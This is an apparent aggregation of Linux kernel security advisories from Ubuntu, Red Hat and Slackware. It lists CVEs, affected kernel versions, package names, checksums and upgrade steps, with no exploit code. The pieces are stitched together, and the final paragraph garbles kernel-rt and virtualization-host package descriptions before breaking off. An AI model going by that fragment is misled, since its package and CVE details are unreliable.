It was discovered that the USB gadget Midi driver in the Linux kernel contained a double-free vulnerability when handling certain error conditions. A local attacker could use this to cause a denial of service (system crash). (CVE-2018-20961)
It was discovered that the XFS file system in the Linux kernel did not properly handle mount failures in some situations. A local attacker could possibly use this to cause a denial of service (system crash) or execute arbitrary code. (CVE-2018-20976)
It was discovered that the RSI 91x Wi-Fi driver in the Linux kernel did not did not handle detach operations correctly, leading to a use-after-free vulnerability. A physically proximate attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-21008)
It was discovered that the Intel Wi-Fi device driver in the Linux kernel did not properly validate certain Tunneled Direct Link Setup (TDLS). A physically proximate attacker could use this to cause a denial of service (Wi-Fi disconnect). (CVE-2019-0136)
It was discovered that the Linux kernel on ARM processors allowed a tracing process to modify a syscall after a seccomp decision had been made on that syscall. A local attacker could possibly use this to bypass seccomp restrictions. (CVE-2019-2054)
It was discovered that an integer overflow existed in the Binder implementation of the Linux kernel, leading to a buffer overflow. A local attacker could use this to escalate privileges. (CVE-2019-2181)
It was discovered that the Marvell Wireless LAN device driver in the Linux kernel did not properly validate the BSS descriptor. A local attacker could possibly use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-3846)
It was discovered that a heap buffer overflow existed in the Marvell Wireless LAN device driver for the Linux kernel. An attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-10126)
It was discovered that the Bluetooth UART implementation in the Linux kernel did not properly check for missing tty operations. A local attacker could use this to cause a denial of service. (CVE-2019-10207)
Jonathan Looney discovered that an integer overflow existed in the Linux kernel when handling TCP Selective Acknowledgments (SACKs). A remote attacker could use this to cause a denial of service (system crash). (CVE-2019-11477)
Jonathan Looney discovered that the TCP retransmission queue implementation in the Linux kernel could be fragmented when handling certain TCP Selective Acknowledgment (SACK) sequences. A remote attacker could use this to cause a denial of service. (CVE-2019-11478)
It was discovered that the ext4 file system implementation in the Linux kernel did not properly zero out memory in some situations. A local attacker could use this to expose sensitive information (kernel memory). (CVE-2019-11833)
It was discovered that the PowerPC dlpar implementation in the Linux kernel did not properly check for allocation errors in some situations. A local attacker could possibly use this to cause a denial of service (system crash). (CVE-2019-12614)
It was discovered that the floppy driver in the Linux kernel did not properly validate meta data, leading to a buffer overread. A local attacker could use this to cause a denial of service (system crash). (CVE-2019-14283)
It was discovered that the floppy driver in the Linux kernel did not properly validate ioctl() calls, leading to a division-by-zero. A local attacker could use this to cause a denial of service (system crash). (CVE-2019-14284)
Wen Huang discovered that the Marvell Wi-Fi device driver in the Linux kernel did not properly perform bounds checking, leading to a heap overflow. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-14814)
Wen Huang discovered that the Marvell Wi-Fi device driver in the Linux kernel did not properly perform bounds checking, leading to a heap overflow. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-14815)
Wen Huang discovered that the Marvell Wi-Fi device driver in the Linux kernel did not properly perform bounds checking, leading to a heap overflow. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-14816)
Matt Delco discovered that the KVM hypervisor implementation in the Linux kernel did not properly perform bounds checking when handling coalesced MMIO write operations. A local attacker with write access to /dev/kvm could use this to cause a denial of service (system crash). (CVE-2019-14821)
Peter Pi discovered a buffer overflow in the virtio network backend (vhost_net) implementation in the Linux kernel. (CVE-2019-14835)
Update instructions:
The problem can be corrected by updating your livepatches to the following versions:
| Kernel                   | Version  | flavors                  |
|--------------------------+----------+--------------------------|
| 4.4.0-148.174            | 58.1     | lowlatency, generic      |
| 4.4.0-148.174~14.04.1    | 58.1     | lowlatency, generic      |
| 4.4.0-150.176            | 58.1     | generic, lowlatency      |
| 4.4.0-150.176~14.04.1    | 58.1     | lowlatency, generic      |
| 4.4.0-151.178            | 58.1     | lowlatency, generic      |
| 4.4.0-151.178~14.04.1    | 58.1     | generic, lowlatency      |
| 4.4.0-154.181            | 58.1     | lowlatency, generic      |
| 4.4.0-154.181~14.04.1    | 58.1     | generic, lowlatency      |
| 4.4.0-157.185            | 58.1     | lowlatency, generic      |
| 4.4.0-157.185~14.04.1    | 58.1     | generic, lowlatency      |
| 4.4.0-159.187            | 58.1     | lowlatency, generic      |
| 4.4.0-159.187~14.04.1    | 58.1     | generic, lowlatency      |
| 4.4.0-161.189            | 58.1     | lowlatency, generic      |
| 4.4.0-161.189~14.04.1    | 58.1     | lowlatency, generic      |
| 4.4.0-164.192            | 58.1     | lowlatency, generic      |
| 4.4.0-164.192~14.04.1    | 58.1     | lowlatency, generic      |
| 4.4.0-165.193            | 58.1     | generic, lowlatency      |
| 4.4.0-1083.93            | 58.1     | aws                      |
| 4.4.0-1084.94            | 58.1     | aws                      |
| 4.4.0-1085.96            | 58.1     | aws                      |
| 4.4.0-1087.98            | 58.1     | aws                      |
| 4.4.0-1088.99            | 58.1     | aws                      |
| 4.4.0-1090.101           | 58.1     | aws                      |
| 4.4.0-1092.103           | 58.1     | aws                      |
| 4.4.0-1094.105           | 58.1     | aws                      |
| 4.15.0-50.54             | 58.1     | generic, lowlatency      |
| 4.15.0-50.54~16.04.1     | 58.1     | generic, lowlatency      |
| 4.15.0-51.55             | 58.1     | generic, lowlatency      |
| 4.15.0-51.55~16.04.1     | 58.1     | generic, lowlatency      |
| 4.15.0-52.56             | 58.1     | lowlatency, generic      |
| 4.15.0-52.56~16.04.1     | 58.1     | generic, lowlatency      |
| 4.15.0-54.58             | 58.1     | generic, lowlatency      |
| 4.15.0-54.58~16.04.1     | 58.1     | generic, lowlatency      |
| 4.15.0-55.60             | 58.1     | generic, lowlatency      |
| 4.15.0-58.64             | 58.1     | generic, lowlatency      |
| 4.15.0-58.64~16.04.1     | 58.1     | lowlatency, generic      |
| 4.15.0-60.67             | 58.1     | lowlatency, generic      |
| 4.15.0-60.67~16.04.1     | 58.1     | generic, lowlatency      |
| 4.15.0-62.69             | 58.1     | generic, lowlatency      |
| 4.15.0-62.69~16.04.1     | 58.1     | lowlatency, generic      |
| 4.15.0-64.73             | 58.1     | generic, lowlatency      |
| 4.15.0-64.73~16.04.1     | 58.1     | lowlatency, generic      |
| 4.15.0-65.74             | 58.1     | lowlatency, generic      |
| 4.15.0-1038.43           | 58.1     | oem                      |
| 4.15.0-1039.41           | 58.1     | aws                      |
| 4.15.0-1039.44           | 58.1     | oem                      |
| 4.15.0-1040.42           | 58.1     | aws                      |
| 4.15.0-1041.43           | 58.1     | aws                      |
| 4.15.0-1043.45           | 58.1     | aws                      |
| 4.15.0-1043.48           | 58.1     | oem                      |
| 4.15.0-1044.46           | 58.1     | aws                      |
| 4.15.0-1045.47           | 58.1     | aws                      |
| 4.15.0-1045.50           | 58.1     | oem                      |
| 4.15.0-1047.49           | 58.1     | aws                      |
| 4.15.0-1047.51           | 58.1     | azure                    |
| 4.15.0-1048.50           | 58.1     | aws                      |
| 4.15.0-1049.54           | 58.1     | azure                    |
| 4.15.0-1050.52           | 58.1     | aws                      |
| 4.15.0-1050.55           | 58.1     | azure                    |
| 4.15.0-1050.57           | 58.1     | oem                      |
| 4.15.0-1051.53           | 58.1     | aws                      |
| 4.15.0-1051.56           | 58.1     | azure                    |
| 4.15.0-1052.57           | 58.1     | azure                    |
| 4.15.0-1055.60           | 58.1     | azure                    |
| 4.15.0-1056.61           | 58.1     | azure                    |
| 4.15.0-1056.65           | 58.1     | oem                      |
| 4.15.0-1057.62           | 58.1     | azure                    |
| 4.15.0-1057.66           | 58.1     | oem                      |
| 4.15.0-1059.64           | 58.1     | azure                    |
| 5.0.0-1014.14~18.04.1    | 58.1     | azure                    |
| 5.0.0-1016.17~18.04.1    | 58.1     | azure                    |
| 5.0.0-1018.19~18.04.1    | 58.1     | azure                    |
| 5.0.0-1020.21~18.04.1    | 58.1     | azure                    |
Support Information:
Kernels older than the levels listed below do not receive livepatch updates. Please upgrade your kernel as soon as possible.
| Series           | Version          | Flavors                  |
|------------------+------------------+--------------------------|
| Ubuntu 18.04 LTS | 4.15.0-1039      | aws                      |
| Ubuntu 16.04 LTS | 4.4.0-1083       | aws                      |
| Ubuntu 18.04 LTS | 5.0.0-1000       | azure                    |
| Ubuntu 16.04 LTS | 4.15.0-1047      | azure                    |
| Ubuntu 18.04 LTS | 4.15.0-50        | generic lowlatency       |
| Ubuntu 16.04 LTS | 4.15.0-50        | generic lowlatency       |
| Ubuntu 14.04 LTS | 4.4.0-148        | generic lowlatency       |
| Ubuntu 18.04 LTS | 4.15.0-1038      | oem                      |
| Ubuntu 16.04 LTS | 4.4.0-148        | generic lowlatency       |
References: CVE-2016-10905, CVE-2018-20856, CVE-2018-20961, CVE-2018-20976, CVE-2018-21008, CVE-2019-0136, CVE-2019-2054, CVE-2019-2181, CVE-2019-3846, CVE-2019-10126, CVE-2019-10207, CVE-2019-11477, CVE-2019-11478, CVE-2019-11833, CVE-2019-12614, CVE-2019-14283, CVE-2019-14284, CVE-2019-14814, CVE-2019-14815, CVE-2019-14816, CVE-2019-14821, CVE-2019-14835
--
ubuntu-security-announce mailing list
ubuntu-security-announce@lists.ubuntu.com
Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis:          Important: kernel security update
Advisory ID:       RHSA-2019:2866-01
Product:           Red Hat Enterprise Linux
Advisory URL:      https://access.redhat.com/errata/RHSA-2019:2866
Issue date:        2019-09-23
CVE Names:         CVE-2019-14835
====================================================================

1. Summary:
An update for kernel is now available for Red Hat Enterprise Linux 7.5 Extended Update Support.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux ComputeNode EUS (v. 7.5) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode Optional EUS (v. 7.5) - x86_64 Red Hat Enterprise Linux Server EUS (v. 7.5) - noarch, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional EUS (v. 7.5) - ppc64, ppc64le, x86_64
- (CVE-2019-14835)

- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
The system must be rebooted for this update to take effect.
- Bugs fixed (https://bugzilla.redhat.com/):
1750727 - CVE-2019-14835 kernel: vhost-net: guest to host kernel escape during migration
- Package List:
Red Hat Enterprise Linux ComputeNode EUS (v. 7.5):
Source: kernel-3.10.0-862.41.2.el7.src.rpm
noarch: kernel-abi-whitelists-3.10.0-862.41.2.el7.noarch.rpm kernel-doc-3.10.0-862.41.2.el7.noarch.rpm
x86_64: kernel-3.10.0-862.41.2.el7.x86_64.rpm kernel-debug-3.10.0-862.41.2.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm kernel-debug-devel-3.10.0-862.41.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-862.41.2.el7.x86_64.rpm kernel-devel-3.10.0-862.41.2.el7.x86_64.rpm kernel-headers-3.10.0-862.41.2.el7.x86_64.rpm kernel-tools-3.10.0-862.41.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm kernel-tools-libs-3.10.0-862.41.2.el7.x86_64.rpm perf-3.10.0-862.41.2.el7.x86_64.rpm perf-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm python-perf-3.10.0-862.41.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional EUS (v. 7.5):
x86_64: kernel-debug-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-862.41.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-862.41.2.el7.x86_64.rpm perf-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm
Red Hat Enterprise Linux Server EUS (v. 7.5):
Source: kernel-3.10.0-862.41.2.el7.src.rpm
noarch: kernel-abi-whitelists-3.10.0-862.41.2.el7.noarch.rpm kernel-doc-3.10.0-862.41.2.el7.noarch.rpm
ppc64: kernel-3.10.0-862.41.2.el7.ppc64.rpm kernel-bootwrapper-3.10.0-862.41.2.el7.ppc64.rpm kernel-debug-3.10.0-862.41.2.el7.ppc64.rpm kernel-debug-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm kernel-debug-devel-3.10.0-862.41.2.el7.ppc64.rpm kernel-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm kernel-debuginfo-common-ppc64-3.10.0-862.41.2.el7.ppc64.rpm kernel-devel-3.10.0-862.41.2.el7.ppc64.rpm kernel-headers-3.10.0-862.41.2.el7.ppc64.rpm kernel-tools-3.10.0-862.41.2.el7.ppc64.rpm kernel-tools-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm kernel-tools-libs-3.10.0-862.41.2.el7.ppc64.rpm perf-3.10.0-862.41.2.el7.ppc64.rpm perf-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm python-perf-3.10.0-862.41.2.el7.ppc64.rpm python-perf-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm
ppc64le: kernel-3.10.0-862.41.2.el7.ppc64le.rpm kernel-bootwrapper-3.10.0-862.41.2.el7.ppc64le.rpm kernel-debug-3.10.0-862.41.2.el7.ppc64le.rpm kernel-debug-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm kernel-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-862.41.2.el7.ppc64le.rpm kernel-devel-3.10.0-862.41.2.el7.ppc64le.rpm kernel-headers-3.10.0-862.41.2.el7.ppc64le.rpm kernel-tools-3.10.0-862.41.2.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm kernel-tools-libs-3.10.0-862.41.2.el7.ppc64le.rpm perf-3.10.0-862.41.2.el7.ppc64le.rpm perf-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm python-perf-3.10.0-862.41.2.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm
s390x: kernel-3.10.0-862.41.2.el7.s390x.rpm kernel-debug-3.10.0-862.41.2.el7.s390x.rpm kernel-debug-debuginfo-3.10.0-862.41.2.el7.s390x.rpm kernel-debug-devel-3.10.0-862.41.2.el7.s390x.rpm kernel-debuginfo-3.10.0-862.41.2.el7.s390x.rpm kernel-debuginfo-common-s390x-3.10.0-862.41.2.el7.s390x.rpm kernel-devel-3.10.0-862.41.2.el7.s390x.rpm kernel-headers-3.10.0-862.41.2.el7.s390x.rpm kernel-kdump-3.10.0-862.41.2.el7.s390x.rpm kernel-kdump-debuginfo-3.10.0-862.41.2.el7.s390x.rpm kernel-kdump-devel-3.10.0-862.41.2.el7.s390x.rpm perf-3.10.0-862.41.2.el7.s390x.rpm perf-debuginfo-3.10.0-862.41.2.el7.s390x.rpm python-perf-3.10.0-862.41.2.el7.s390x.rpm python-perf-debuginfo-3.10.0-862.41.2.el7.s390x.rpm
x86_64: kernel-3.10.0-862.41.2.el7.x86_64.rpm kernel-debug-3.10.0-862.41.2.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm kernel-debug-devel-3.10.0-862.41.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-862.41.2.el7.x86_64.rpm kernel-devel-3.10.0-862.41.2.el7.x86_64.rpm kernel-headers-3.10.0-862.41.2.el7.x86_64.rpm kernel-tools-3.10.0-862.41.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm kernel-tools-libs-3.10.0-862.41.2.el7.x86_64.rpm perf-3.10.0-862.41.2.el7.x86_64.rpm perf-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm python-perf-3.10.0-862.41.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm
Red Hat Enterprise Linux Server Optional EUS (v. 7.5):
ppc64: kernel-debug-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm kernel-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm kernel-debuginfo-common-ppc64-3.10.0-862.41.2.el7.ppc64.rpm kernel-tools-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm kernel-tools-libs-devel-3.10.0-862.41.2.el7.ppc64.rpm perf-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm python-perf-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm
ppc64le: kernel-debug-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm kernel-debug-devel-3.10.0-862.41.2.el7.ppc64le.rpm kernel-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-862.41.2.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm kernel-tools-libs-devel-3.10.0-862.41.2.el7.ppc64le.rpm perf-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm
x86_64: kernel-debug-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-862.41.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-862.41.2.el7.x86_64.rpm perf-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2019-14835 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/security/vulnerabilities/kernel-vhost
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2019 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBXYiswNzjgjWX9erEAQhd1g//WDRHc/Prfvv6JNbmMdvxJvpXZx3Wc535 /AQUarXoBalyktM8ucRBOg28X4Eq7Y8WF9jbdoyp8iIrirZQdA7+4yEI6O6GnY2m M3sx6Kw9jbNFxP72zUxOK6hMuR8pimz0RWIdc8vQgfA3UuTyjjfvHjjr361FCRHF bjRgMl4sOuMbwrxs/h6NgeKVLUw5EoHTrJ6Hc8Vv5wIjyir1bSMH0aikAirkoZ0Y WtR3Z7lvODMcY4wKXecyVc/xslg1ioZhS9gGsG+TJ2fUMw7sZr5ERccc+1UWGFUa 2knyaFEQUSEYweDEsYm3zR3G75rNljzX8VZaEN/ShQwIA46k8J/Z7Wdy7DC6e66/ FUOKdD8MEjOieoDLfXZpOlBJ1UWBCC8/HYuP7ujFpiCvN7zFBd/HYAIUnhC+y5wg XHTc05QJbalfHAntTQRzlwS8Uc746PjBlykrWETVFwyVu3u1cfxbSYsP4TA/6yvE AUK1uea0hbg6RgaceZfyIV8YIaaJB5fmS4Ula4p4ppBf5HuF+L0eRl5zYzhA0Ryl NSNr5YeIrmCVr6UjEBNZlClSOwi4RN2pQ1VmAcbrsACYuOcKVD1PtoCH087ISIjP Lej+FZxY423yc9s1/2RxoVIgYwInTzttvauDR8ws4bDmxbPzWrlpT7ciee5kdSQr jZmQ2x5ylP4=z5bF -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce .
Here are the details from the Slackware 14.2 ChangeLog: +--------------------------+ patches/packages/linux-4.4.199/: Upgraded. These updates fix various bugs and security issues. If you use lilo to boot your machine, be sure lilo.conf points to the correct kernel and initrd and run lilo as root to update the bootloader. If you use elilo to boot your machine, you should run eliloconfig to copy the kernel and initrd to the EFI System Partition. For more information, see: Fixed in 4.4.191: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3900 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15118 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10906 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10905 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10638 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15117 Fixed in 4.4.193: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14835 Fixed in 4.4.194: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14816 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14814 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15505 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14821 Fixed in 4.4.195: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17053 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17052 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17056 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17055 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17054 Fixed in 4.4.196: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2215 Fixed in 4.4.197: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16746 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20976 Fixed in 4.4.198: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17075 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17133 Fixed in 4.4.199: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15098 (* Security fix *)
+--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated packages for Slackware 14.2: ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-generic-4.4.199-i586-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-generic-smp-4.4.199_smp-i686-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-headers-4.4.199_smp-x86-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-huge-4.4.199-i586-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-huge-smp-4.4.199_smp-i686-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-modules-4.4.199-i586-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-modules-smp-4.4.199_smp-i686-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-source-4.4.199_smp-noarch-1.txz
Updated packages for Slackware x86_64 14.2: ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-generic-4.4.199-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-headers-4.4.199-x86-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-huge-4.4.199-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-modules-4.4.199-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-source-4.4.199-noarch-1.txz
MD5 signatures: +-------------+
Slackware 14.2 packages:
0e523f42e759ecc2399f36e37672f110 kernel-generic-4.4.199-i586-1.txz ee6451f5362008b46fee2e08e3077b21 kernel-generic-smp-4.4.199_smp-i686-1.txz a8338ef88f2e3ea9c74d564c36ccd420 kernel-headers-4.4.199_smp-x86-1.txz cd9e9c241e4eec2fba1dae658a28870e kernel-huge-4.4.199-i586-1.txz 842030890a424023817d42a83a86a7f4 kernel-huge-smp-4.4.199_smp-i686-1.txz 257db024bb4501548ac9118dbd2d9ae6 kernel-modules-4.4.199-i586-1.txz 96377cbaf7bca55aaca70358c63151a7 kernel-modules-smp-4.4.199_smp-i686-1.txz 0673e86466f9e624964d95107cf6712f kernel-source-4.4.199_smp-noarch-1.txz
Slackware x86_64 14.2 packages: 6d1ff428e7cad6caa8860acc402447a1 kernel-generic-4.4.199-x86_64-1.txz dadc091dc725b8227e0d1e35098d6416 kernel-headers-4.4.199-x86-1.txz f5f4c034203f44dd1513ad3504c42515 kernel-huge-4.4.199-x86_64-1.txz a5337cd8b2ca80d4d93b9e9688e42b03 kernel-modules-4.4.199-x86_64-1.txz 5dd6e46c04f37b97062dc9e52cc38add kernel-source-4.4.199-noarch-1.txz
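The checksums above can be verified with md5sum(1) before installation. A minimal sketch of the check follows; the file and checksum are demo stand-ins, not the real packages, and for a real download you would paste the published value from the list above instead of computing it locally:

```shell
# Demo of the MD5 check: create a stand-in file, compute its checksum the way
# the values above were published, then verify it with `md5sum -c`.
printf 'demo package contents\n' > demo.txz
expected=$(md5sum demo.txz | awk '{print $1}')   # stand-in for a published value
echo "${expected}  demo.txz" | md5sum -c -
```

Note that `md5sum -c` expects two spaces between the checksum and the filename; a mismatch makes it exit nonzero, so the check can gate a scripted upgrade.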
Installation instructions: +------------------------+
Upgrade the packages as root:
upgradepkg kernel-*.txz
If you are using an initrd, you'll need to rebuild it.
For a 32-bit SMP machine, use this command (substitute the appropriate kernel version if you are not running Slackware 14.2):
/usr/share/mkinitrd/mkinitrd_command_generator.sh -k 4.4.199-smp | bash
For a 64-bit machine, or a 32-bit uniprocessor machine, use this command (substitute the appropriate kernel version if you are not running Slackware 14.2):
/usr/share/mkinitrd/mkinitrd_command_generator.sh -k 4.4.199 | bash
Please note that "uniprocessor" has to do with the kernel you are running, not with the CPU. Most systems should run the SMP kernel (if they can) regardless of the number of cores the CPU has. If you aren't sure which kernel you are running, run "uname -a". If you see SMP there, you are running the SMP kernel and should use the 4.4.199-smp version when running mkinitrd_command_generator. Note that this is only for 32-bit -- 64-bit systems should always use 4.4.199 as the version.
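The version-selection rule described above can be sketched as a small shell helper. The function name pick_kver is hypothetical; the version strings are the ones from this advisory:

```shell
# Hypothetical helper implementing the rule above: 64-bit systems always use
# the plain "4.4.199" version string; 32-bit systems use "4.4.199-smp" only
# when `uname -a` reports an SMP kernel.
pick_kver() {
    uname_a=$1
    arch=$2
    if [ "$arch" != "x86_64" ] && printf '%s' "$uname_a" | grep -q SMP; then
        echo "4.4.199-smp"
    else
        echo "4.4.199"
    fi
}

# On a live system the result would be fed to mkinitrd_command_generator.sh -k:
pick_kver "$(uname -a)" "$(uname -m)"
```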
If you are using lilo or elilo to boot the machine, you'll need to ensure that the machine is properly prepared before rebooting.
If using LILO: By default, lilo.conf contains an image= line that references a symlink that always points to the correct kernel. No editing should be required unless your machine uses a custom lilo.conf. If that is the case, be sure that the image= line references the correct kernel file. Either way, you'll need to run "lilo" as root to reinstall the boot loader.
If using elilo: Ensure that the /boot/vmlinuz symlink is pointing to the kernel you wish to use, and then run eliloconfig to update the EFI System Partition.
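Confirming where the symlink points before running eliloconfig can be done with readlink. A sketch using a throwaway directory in place of the real /boot:

```shell
# Demo: check that a vmlinuz symlink targets the intended kernel image.
# A temporary directory stands in for /boot here; the kernel filename is
# illustrative.
mkdir -p demo-boot
touch demo-boot/vmlinuz-generic-4.4.199
ln -sf vmlinuz-generic-4.4.199 demo-boot/vmlinuz
readlink demo-boot/vmlinuz   # -> vmlinuz-generic-4.4.199
```

If the target is wrong, re-point the symlink with `ln -sf` before updating the EFI System Partition.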
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address. | +------------------------------------------------------------------------+
Description:
The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. These packages include redhat-release-virtualization-host, ovirt-node, and rhev-hypervisor. RHVH features a Cockpit user interface for monitoring the host's resources and performing administrative tasks.
The following packages have been upgraded to a later upstream version: redhat-release-virtualization-host (4.2), redhat-virtualization-host (4.2). (CVE-2019-15031)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
